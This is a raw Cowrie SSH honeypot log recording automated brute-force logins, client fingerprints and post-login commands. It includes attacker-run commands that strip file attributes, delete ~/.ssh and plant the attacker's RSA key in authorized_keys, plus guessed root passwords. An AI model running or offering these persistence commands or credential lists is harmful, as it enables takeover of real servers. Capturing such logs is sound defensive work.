{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51420,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a52d92573cc","protocol":"ssh","message":"New connection: 212.227.235.229:51420 (1.2.3.4:22) [session: 9a52d92573cc]","sensor":"my-vps","timestamp":"2025-08-31T03:35:57.574477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:35:58.288258Z","src_ip":"212.227.235.229","session":"9a52d92573cc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:35:58.289055Z","src_ip":"212.227.235.229","session":"9a52d92573cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60126,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff61302dd3cd","protocol":"ssh","message":"New connection: 212.227.235.229:60126 (1.2.3.4:22) [session: ff61302dd3cd]","sensor":"my-vps","timestamp":"2025-08-31T03:36:01.141325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:36:01.142060Z","src_ip":"212.227.235.229","session":"ff61302dd3cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:36:01.259844Z","src_ip":"212.227.235.229","session":"ff61302dd3cd"}
{"eventid":"cowrie.login.success","username":"root","password":"QWE!@#123","message":"login attempt [root/QWE!@#123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:36:01.779299Z","src_ip":"212.227.235.229","session":"ff61302dd3cd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:36:02.041906Z","src_ip":"212.227.235.229","session":"ff61302dd3cd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:36:02.042795Z","src_ip":"212.227.235.229","session":"ff61302dd3cd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:36:02.043857Z","src_ip":"212.227.235.229","session":"ff61302dd3cd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:36:02.163446Z","src_ip":"212.227.235.229","session":"ff61302dd3cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47876,"dst_ip":"1.2.3.4","dst_port":22,"session":"38ddba339f3d","protocol":"ssh","message":"New connection: 212.227.235.229:47876 (1.2.3.4:22) [session: 38ddba339f3d]","sensor":"my-vps","timestamp":"2025-08-31T03:36:02.357524Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:36:02.465569Z","src_ip":"212.227.235.229","session":"ff61302dd3cd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T03:36:02.466334Z","src_ip":"212.227.235.229","session":"ff61302dd3cd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T03:36:02.587313Z","src_ip":"212.227.235.229","session":"ff61302dd3cd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:36:02.588355Z","src_ip":"212.227.235.229","session":"ff61302dd3cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60500,"dst_ip":"1.2.3.4","dst_port":22,"session":"54089850a8d3","protocol":"ssh","message":"New connection: 212.227.235.229:60500 (1.2.3.4:22) [session: 54089850a8d3]","sensor":"my-vps","timestamp":"2025-08-31T03:36:02.703595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:36:02.704676Z","src_ip":"212.227.235.229","session":"54089850a8d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:36:02.820783Z","src_ip":"212.227.235.229","session":"54089850a8d3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T03:36:03.335338Z","src_ip":"212.227.235.229","session":"54089850a8d3"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"12345","message":"login attempt [hadoop/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T03:36:04.292700Z","src_ip":"212.227.235.229","session":"9a52d92573cc"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:36:04.454060Z","src_ip":"212.227.235.229","session":"54089850a8d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60964,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d78f8c30c65","protocol":"ssh","message":"New connection: 212.227.235.229:60964 (1.2.3.4:22) [session: 9d78f8c30c65]","sensor":"my-vps","timestamp":"2025-08-31T03:36:04.565418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:36:04.567935Z","src_ip":"212.227.235.229","session":"9d78f8c30c65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:36:04.680678Z","src_ip":"212.227.235.229","session":"9d78f8c30c65"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:36:04.757840Z","src_ip":"212.227.125.160","session":"aa279bbec812"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:36:05.137919Z","src_ip":"212.227.235.229","session":"9d78f8c30c65"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:36:05.253082Z","src_ip":"212.227.235.229","session":"9d78f8c30c65"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:36:05.254078Z","src_ip":"212.227.235.229","session":"ff61302dd3cd"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:36:06.154610Z","src_ip":"212.227.235.229","session":"9a52d92573cc"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.114.29","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"62694679e473","protocol":"ssh","message":"New connection: 196.251.114.29:51824 (1.2.3.4:22) [session: 62694679e473]","sensor":"my-vps","timestamp":"2025-08-31T03:36:06.842233Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:36:06.872515Z","src_ip":"196.251.114.29","session":"62694679e473"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:36:09.682355Z","src_ip":"212.227.235.229","session":"38ddba339f3d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:36:09.918099Z","src_ip":"212.227.235.229","session":"38ddba339f3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41462,"dst_ip":"1.2.3.4","dst_port":22,"session":"37297b99575f","protocol":"ssh","message":"New connection: 212.227.125.160:41462 (1.2.3.4:22) [session: 37297b99575f]","sensor":"my-vps","timestamp":"2025-08-31T03:36:18.754391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:36:19.312737Z","src_ip":"212.227.125.160","session":"37297b99575f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:36:19.313741Z","src_ip":"212.227.125.160","session":"37297b99575f"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"12345","message":"login attempt [hadoop/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T03:36:21.724653Z","src_ip":"212.227.125.160","session":"37297b99575f"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:36:23.260885Z","src_ip":"212.227.125.160","session":"37297b99575f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48654,"dst_ip":"1.2.3.4","dst_port":22,"session":"16ca8a0a216e","protocol":"ssh","message":"New connection: 212.227.235.229:48654 (1.2.3.4:22) [session: 16ca8a0a216e]","sensor":"my-vps","timestamp":"2025-08-31T03:36:33.524487Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:36:33.525399Z","src_ip":"212.227.235.229","session":"16ca8a0a216e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:36:33.775441Z","src_ip":"212.227.235.229","session":"16ca8a0a216e"}
{"eventid":"cowrie.login.failed","username":"power","password":"power123","message":"login attempt [power/power123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:36:34.816859Z","src_ip":"212.227.235.229","session":"16ca8a0a216e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:36:36.069757Z","src_ip":"212.227.235.229","session":"16ca8a0a216e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:36:36.916878Z","src_ip":"212.227.125.160","session":"aa279bbec812"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:36:36.917689Z","src_ip":"212.227.125.160","session":"aa279bbec812"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58486,"dst_ip":"1.2.3.4","dst_port":22,"session":"773b8aa744c3","protocol":"ssh","message":"New connection: 212.227.125.160:58486 (1.2.3.4:22) [session: 773b8aa744c3]","sensor":"my-vps","timestamp":"2025-08-31T03:36:49.094871Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48232,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbf2f30a440b","protocol":"ssh","message":"New connection: 212.227.125.160:48232 (1.2.3.4:22) [session: fbf2f30a440b]","sensor":"my-vps","timestamp":"2025-08-31T03:36:55.720385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:36:56.547424Z","src_ip":"212.227.125.160","session":"fbf2f30a440b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:36:56.548185Z","src_ip":"212.227.125.160","session":"fbf2f30a440b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59392,"dst_ip":"1.2.3.4","dst_port":22,"session":"c675d2e85bba","protocol":"ssh","message":"New connection: 212.227.235.229:59392 (1.2.3.4:22) [session: c675d2e85bba]","sensor":"my-vps","timestamp":"2025-08-31T03:36:56.572387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:36:57.316529Z","src_ip":"212.227.235.229","session":"c675d2e85bba"}
